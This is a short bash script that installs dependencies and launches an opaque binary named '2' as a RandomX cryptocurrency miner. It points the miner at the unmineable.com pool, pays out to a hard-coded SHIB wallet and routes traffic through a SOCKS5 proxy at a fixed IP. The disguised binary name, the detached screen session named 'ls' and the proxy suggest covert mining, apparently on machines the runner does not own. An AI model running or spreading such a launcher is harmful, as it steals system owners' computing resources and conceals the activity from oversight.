#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
screen -dmS ls

 ./2 -a rx/0 -o rx-eu.unmineable.com:3333  -u SHIB:0x7c010aa62bc975b07cce8a84abca304f1d23a4f9.$(echo $(shuf -i 1000-9999 -n 1)-SUPER99)#rame-kb3u -x socks5://98.175.31.195:4145 
